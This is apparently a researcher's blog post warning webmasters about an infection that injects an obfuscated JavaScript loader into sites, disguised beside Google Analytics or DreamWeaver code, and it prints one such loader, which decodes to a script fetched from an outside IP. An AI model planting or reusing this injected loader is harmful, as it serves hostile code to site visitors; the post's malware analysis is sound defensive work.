This is a post about this week’s prevalent website infection. There are quite a few modifications but they all link to the same IP-address: 84 .244 .138 .55 and if Google detects the malicious scripts it blacklists infected sites reporting that “Malicious software is hosted on 1 domain(s), including 188.8.131.52/.”
I’ve seen two modification of the malicious script:
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iyyq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";
var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.w rite(result);
(all scripts are slightly changed to make them less harmfull if you paste them somewhere)
This modification can be usually found attached to the existing Google Analytics script block. This way hackers try to make it less prominent. Some webmasters may even think it’s a part of a legitimate Google’s code. It is not.
When this code is executed (every time a visitor opens a web page in a browser), it creates the following script
The script uses Google Analytics-like names to make it look like a legitimate script if someone managed to decode it. Don’t be fooled.
Sometimes this script is injected in a separate script block at the end of HTML code.
The second modification looks different but under the hood it’s almost the same:
When it is executed it creates the following script
I found this script attached at the end of a standard DreamWeaver script block with MM_preloadImages, MM_swapImage, etc. functions.
If you are a webmaster or an owner of such a compromised site you would definitely want to know how to resolve the issue and make sure it won’t happen to your site again.
As an external researcher, I don’t have enough information to come up with a 100% reliable recipe. However, I had a few conversations with webmasters of compromised sites and have a strong feeling that this exploit has to do with compromised passwords.
Hope this information helps. If you have anything to add, share your thoughts or ask questions in the comments below.